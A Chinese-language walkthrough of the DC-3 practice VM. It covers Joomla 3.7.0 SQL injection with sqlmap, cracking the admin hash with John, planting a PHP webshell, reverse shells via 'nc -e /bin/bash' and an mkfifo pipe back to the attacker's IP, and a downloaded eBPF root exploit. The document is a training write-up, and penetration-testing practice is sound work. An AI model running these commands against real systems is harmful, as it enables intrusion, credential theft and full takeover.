目錄

DC-3靶機滲透測試

一、實驗環境

二、滲透過程演示

1、信息搜集

2、SQL注入

3、登錄后臺

4、反彈shell

5、提權

總結：

---

?

DC-3靶機滲透測試

DC-3也是一個黑盒測試，我們所能知道的只有它的MAC地址，我們可以根據它的MAC地址來確定IP地址

一、實驗環境

??? 實驗環境：
??? kali2021：192.168.3.155/24（橋接到vmnet0）
??? 靶機環境DC-3（橋接到vmnet0，MAC地址：00:0C:29:2C:47:A4）
??? 保證kali和DC-3在同一個網段

二、滲透過程演示

1、信息搜集

①搜集IP和端口

利用nmap或者是netdiscover

使用命令：netdiscover或者 netdiscover -r 192.168.3.0/24或者nmap -sP 192.168.3.1/24 -o nmap.sP，得知DC-3的IP地址為192.168.3.159

接下來對DC-3做端口掃描

nmap -A 192.168.3.159 -p 1-65535 -oN nmap.A??? 發現僅開放了80端口

訪問192.168.3.159這個網頁，如下圖所示

我們發現好像不太能夠確定網站究竟使用的是什么，我們對網站做指紋識別，做指紋識別的時候我們用whatweb命令。

whatweb -h查看命令用法

網站指紋識別工具Whatweb的使用：

命令：whatweb http://192.168.3.159，發現是Joomla，開源的內容管理系統

國外三大開源的PHP CMS ：
1、drupal
2、wordpress site
3、joomla

發現是joomla,這個就可以使用網站針對這個cms的掃描器Joomscan，kali默認是沒有安裝的，需要自己手動安裝

joomscan專門掃描joomla

②joomscan安裝和使用

Joomscan安裝

git clone https://github.com/rezasp/joomscan.git

或者apt install joonscan（√）

使用方法

joomscan --url http://192.168.3.159

上面那些目錄都是可以看的

得到joomla對應版本以及后臺地址http://192.168.3.159/administrator/，看看能不能得到網站后臺的賬密，做爆破（這是絕招，不到萬不得已不建議用）

?

2、SQL注入

③搜索關于joomla3.7.0有沒有漏洞（exploitdb查找對應exp）

在kali自帶的exploitdb中查找對應版本的joomla漏洞

searchsploit joomla 3.7.0??? 發現了有SQL注入漏洞

接下來把這個文件復制到當前路徑下：cp /usr/share/exploitdb/exploits/php/webapps/42033.txt?? joomlav370_sqli.txt

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

執行前把地址改一下：localhost改為192.168.3.159

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

--dbs是列出當前服務器中的mysql數據庫中都有哪些庫名：

爆庫名：--dbs

、

列出當前數據庫的名字：--current-db

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

爆表：-D "joomladb" --tables

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

查詢列、字段：-D "joomladb" -T "#__users" --columns

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
給個路徑寫1，線程寫10

列目錄（name，password）：-C指定字段? -C "name,password" --dump

sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

?name ? | password????????????????????????????????????????????????????
+---------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |

?

使用John解密

著名密碼破解利器John the Ripper

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

將上述密文寫到一個文件里面：vim joomla_v370_admin_hash.txt

john joomla_v370_admin_hash.txt??? 解出密碼：snoopy

3、登錄后臺

admin | snoopy 成功登陸后臺

登錄進后臺，發現可以修改網頁源代碼

這個地方如果可以修改PHP文件的話，那就可以直接寫一個PHP大馬/小馬，要找到路徑，根據joomla網站特點，一般在/templates下

?

在template欄中發現可以寫文件和上傳文件。我們可以寫一個小馬上傳上去

點擊NewFile創建文件（yjh.php）

接下來打開蟻劍

右鍵查看虛擬終端：whoami

4、反彈shell

kali 本地監聽

??? nc -lvvp 2333

蟻劍虛擬終端

??? nc -e /bin/bash 192.168.3.155 2333

??? -e 參數不可用

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.155 2333 >/tmp/f

反彈成功！！！

5、提權

①信息收集

cat /proc/version查看版本
cat /etc/issue查看發行版信息

發現該靶機版本為Ubuntu 16.04

②在exploitdb中查找對應版本的joomla漏洞

輸入如下命令查看該版本漏洞

searchsploit Ubuntu 16.04

使用39772.txt進行提權

cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604_shell.txt

cat ubuntu1604_shell.txt

先把exp下載到kali鏡像中

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在反彈shell 的界面測試，發現訪問失敗，原因是我們的電腦無法訪問國外的服務器

解決方法：我們先將39772.zip 文件下載至本地，本地搭建服務器，將文件上傳至服務器，

我們直接訪問本地服務器下載文件即可

直接在靶機中下載容易失敗。我們先下載到本地，在kali中搭建服務，并將exp壓縮包上傳上去

EXP資源

鏈接：https://pan.baidu.com/s/1AeuJrP-T6elka5aZP9KL9g
提取碼：0fkw

將下載的壓縮包放到/var/www/html/文件夾下

?

接下來只需要在shell中輸入如下命令即可將exp下載到靶機(DC-3)中

wget http://192.168.3.155/39772.zip（192.168.3.155是kali的IP，把kali上的文件下載到DC3）

之后解壓該文件

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

cd ebpf_mapfd_doubleput_exploit

./compile.sh

./doubleput

改個密碼：

總結：

1、Joomscan可針對JoomlaCMS進行掃描

2、使用kali自帶exploitdb庫可查詢kali收集的各種exp，命令為Searchsploit 程序名稱 版本

3、使用John對hash值解密

4、bash反彈shell

?

?

?

總結

以上是生活随笔為你收集整理的【CyberSecurityLearning 72】DC系列之DC-3渗透测试（Joomla）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。